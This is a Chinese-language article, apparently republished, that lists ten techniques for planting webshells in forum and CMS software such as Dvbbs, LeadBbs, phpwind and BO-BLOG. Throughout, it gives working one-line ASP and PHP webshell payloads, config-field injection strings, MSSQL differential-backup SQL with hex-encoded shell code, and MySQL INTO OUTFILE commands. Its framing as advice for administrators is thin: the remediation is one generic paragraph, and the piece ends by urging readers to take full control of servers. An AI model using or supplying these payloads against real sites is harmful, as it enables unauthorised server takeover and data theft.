十种获取webshell的办法脚本之家mingxing - 千亿集团

十种获取webshell的办法脚本之家mingxing

2019-02-02 07:04:07 | 作者: 运升 | 标签: 办法,文件,备份 | 浏览: 1178

黑客在侵略企业网站时,一般要经过各种办法获取webshell然后取得企业网站的操控权,然后便利进行之后的侵略行为。本篇文章将怎样获取webshell总结成为了十种办法,期望广阔的企业网络办理员能够经过了解获取webshell的途径,对企业本身进行防备。

一、直接上传获取webshell

这种对php和jsp的一些程序比较常见,MolyX BOARD就是其间一例,直接在心境图标办理上传。php类型,尽管没有提示,其实现已成功了,上传的文 件url应该是https://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp体系缝隙就能够直接上传jsp文件。文件名是本来的文件名,bo-blog后台能够能够直接上传。php文件,上传的文件途径有提示。以及一年前非常盛行的upfile.asp缝隙(动网5.0和6.0、前期的许多整站体系),因过滤上传文件不严,导致用户能够直接上传webshell到网站恣意可写目录中,然后拿到网站的办理员操控权限。

二、增加修正上传类型

现在许多的脚本程序上传模块不是只答应上传合法文件类型,而大多数的体系是答应增加上传类型,bbsxp后台能够增加asa|asP类型,ewebeditor的后台也可增加asa类型,经过修正后咱们能够直接上传asa后缀的webshell了,还有一种状况是过滤了。asp,能够增加。aspasp的文件类型来上传取得webshell.php体系的后台,咱们能够增加。php.g1f的上传类型,这是php的一个特性,最终的哪个只需不是已知的文件类型即可,php会将php.g1f作为。php来正常运转,然后也可成功拿到shell.LeadBbs3.14后台取得webshell办法是:在上传类型中增加asp ,留意,asp后边是有个空格的,然后在前台上传ASP马,当然也要在后边加个空格!

三、运用后台办理功用写入webshell

上传缝隙基本上补的也差不多了,所以咱们进入后台后还能够经过修正相关文件来写入webshell.比较的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修正配置文件,写入后缀是asp的文件。而LeadBbs3.14后台取得webshell另一办法是:增加一个新的友谊链接,在网站称号处写上冰狐最小马即可,最小马前后要随意输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp就是咱们想要的shell.

四、运用后台办理向配置文件写webshell

运用"""":""//"等符号结构最小马写入程序的配置文件,joekoe论坛,某某同学录,欢腾展望新闻体系,COCOON Counter计算程序等等,还有许多php程序都能够,COCOON Counter计算程序举例,在办理邮箱处添上cnhacker@263.net":eval request(chr (35))//, 在制造文件中就是webmail="cnhacker@263.net\":eval request(chr(35))//",还有一种办法就是写上 cnhacker@263.net"%><%eval request(chr(35))%><%,这样就会构成前后对应,最小马也就运转了。<%eval request(chr(35))%>能够用lake2的eval发送端以及最新的2006 客户端来连,需求阐明的是数据库插马时分要选前者。再如动易2005,到文章中心办理-顶部菜单设置-菜单其它特效,刺进一句话马"%><%execute request("l")%><%,保 存顶部栏目菜单参数设置成功后,咱们就得到马地址https://网站/admin/rootclass_menu_config.asp.

五、运用后台数据库备份及康复获取webshell

首要是运用后台对access数据库的“备份数据库”或“康复数据库”功用,“备份的数据库途径”等变量没有过滤导致能够把恣意文件后缀改 为asp,然后得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样能够运用。还能够备份网站asp文件为其他后缀 如。txt文件,然后能够检查并取得网页源代码,并取得更多的程序信息增加取得webshell的时机。在实践运用中经常会碰到没有上传功用的时 候,可是有asp体系在运转,运用此办法来检查源代码来取得其数据库的方位,为数据库插马来发明时机,动网论坛就有一个ip地址的数据库,在后台的ip办理中能够刺进最小马然后备份成。asp文件即可。在谈谈打破上传检测的办法,许多asp程序在即便改了后缀名后也会提示文件不合法,经过在。asp文件头加上gif89a修正后缀为gif来骗过asp程序检测到达上传的意图,还有一种就是用记事本翻开图片文件,随意张贴一部分复制到asp木马文件头,修正gif后缀后上传也能够打破检测,然后备份为。asp文件,成功得到webshell.

六、运用数据库紧缩功用

能够将数据的防下载失效然后使刺进数据库的最小马成功运转,比较典型的就是loveyuki的L-BLOG,在友谊增加的url出写上<%eval request (chr(35))%>, 提交后,在数据库操作中紧缩数据库,能够成功紧缩出。asp文件,用海洋的最小马的eval客户端连就得到一个webshell.

七、asp+mssql体系

这儿需求提一点动网mssql版,可是能够直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传途径。写一个本地提交的表单,代码如下:<form action=https://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post"> <p>已上传文件的方位:<input name="Dbpath" type="text" size="80"></p> <p>要复制到的方位:<input name="backpath" type="text" size="80"></p> <p><input type="submit" value="提交"></p> </form>另存为。htm本地履行。把假图片上传途径填在“已上传文件的方位”那里,想要备份的WebShell的相对途径填写在“要复制到的方位”那里,提交就得到咱们心爱的WebShell了,康复代码和此相似,修正相关当地就能够了。没有遇到过后台履行mssql指令比较强壮的asp程序后台,动网的数据库复原和备份是个铺排,不能履行sql指令备份webshell,只能履行一些简略的查询指令。能够运用mssql注入差异备份webshell,一般后台是显现了绝对途径,只需有了注入点基本上就能够差异备份成功。下面是差异备份的首要句子代码,运用动网7.0的注入缝隙能够用差异备份一个webshell,能够用运用上面说到的办法,将conn.asp文件备份成。txt文件而取得库名。

差异备份的首要代码:

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s——
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])——
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)——
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT——这段代码中,0x626273是要备份的库名bbs的十六进制,能够是其他姓名比方bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也就是你要备份的webshell途径。当然也能够用比较常见备份办法来取得webshell,仅有的缺乏就是备份后的文件过大,假如备份数据库中有防下载的的数据表,或许有过错的asp代码,备份出来的webshell就不会成功运转,运用差异备份是成功率比较高的办法,而且极大的削减备份文件的巨细。

八、php+mysql体系

后台需求有mysql数据查询功用,咱们就能够运用它履行SELECT …… INTO OUTFILE查询输出php文件,因为一切的数据是存放在mysql里的,所以咱们能够经过正常手法把咱们的webshell代码刺进mysql在运用SELECT …… INTO OUTFILE句子导出shell.在mysql操作里输入select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile 途径‘ 就能够取得了一个<?eval($_POST[a]);?>的最小马 0x3C3F6576616C28245F504F53545B615D293B3F3E 是咱们<?eval($_POST[a]);?>的十六进制,这种办法对phpmyadmin比较遍及,先运用phpmyadmin的途径走漏缝隙,就能够暴出途径,php环境中比较简略暴出绝对途径:)。提一点的是遇到是mysql在win体系下途径应该这样写d:\\wwwroot\\a.php.下面的办法是比较常用的一个导出webshell的办法,也能够写个vbs增加体系办理员的脚本导出到发动文件夹,体系重起后就会增加一个办理员帐号CREATE TABLE a(cmd text NOT NULL)

INSERT INTO a(cmd) VALUES(<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>)

select cmd from a into outfile 途径/b.php DROP TABLE IF EXISTS a拜访b.php就会生成一个<?eval($_POST[a]);?>的最小马。

假如遇到能够履行php指令就简略多了,典型的代表是BO-BLOG,在后台的php指令框输入以下代码:

<?$sa = fopen("./up/saiy.php","w");fwrite($sa,"<?eval(\$_POST[a]);?".">");fclose($sa);?>

就会在up目录下生成文件名为saiy.php内容为<?eval($_POST[a]);?>的最小php木马,最终用lanker的客户端来衔接。实践运用中要考虑到文件夹是否有写权限。或许输入这样的代码<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?> 将会在当时目录生成一个a.php的最小马。

九、phpwind论坛从后台到webshell的三种办法

办法1 模板法进入后台, 风格模版设置 ,在随意一行写代码,记住,这代码有必要顶着左面行写,代码前面不能够有任何字符。

EOT;eval($a);print <<<EOT然后得到一个shell为https://网站/bbs/index.php.

办法2 脏话过滤法进入安全办理 ◇ 不良词语过滤。新增不良词语写 a‘]=’aa‘;eval($_POST[’a‘]);//

替换为那里能够随意写,然后得到一个shell地址为https://网站/bbs/data/bbscache/wordsfb.php.

办法3 用户等级办理新树立会员组,头衔你能够随意写,可是千万不要写单双引号特殊符号,晋级图片号写a‘;eval($_POST[’a‘]);// ,晋级点数仍然能够随意写。然后得到一个shell地址为https://网站/bbs/data/bbscache/level.php.以上三种办法得到webshellr的暗码是a,为lanker的一句话后门服务端。

十、运用网站拜访计数体系记载来获取webshell

最显着的就是某私服程序内的阿江计数程序,能够经过https://网站/stat.asp?style=text&referer= 代码内容&screenwidth=1024直接提交, 即可把代码内容直接刺进到计数体系的数据库中,而此体系默许数据库为count#.asa,咱们能够经过https://网站/count%23.asa拜访得到webshell,因为阿江计数程序过滤了%和+,将最小马改成<SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT>eval(Request("1"))</SCRIPT>替换代码内容处提交,然后用lake2的eval客户端来提交,值得一提的是假如进到计数后台,能够整理某时某刻的数据,一旦刺进asp木马失利,能够整理数据库再次操作。

解决方案因为本文触及的代码版别许多,所以不可能供给一个完美的解决方案。有才能者能够针对本文说到的缝隙文件进行恰当修补,若缝隙文件不影响体系运用也可删去此文件。我们假如不会修补,能够到相关官方网站下载最新补丁进行修正更新。一起也请我们能时间重视各大安全网络发布的最新布告,若自己发现相关缝隙也可及时告诉官方网站。

从后台得到webshell的技巧应该还有许多的,关键是要看我们怎样灵活运用、举一反三,期望本文的办法能起到抛砖引玉的效果。 各位加油吧,让咱们将服务器操控究竟!

版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表千亿集团立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章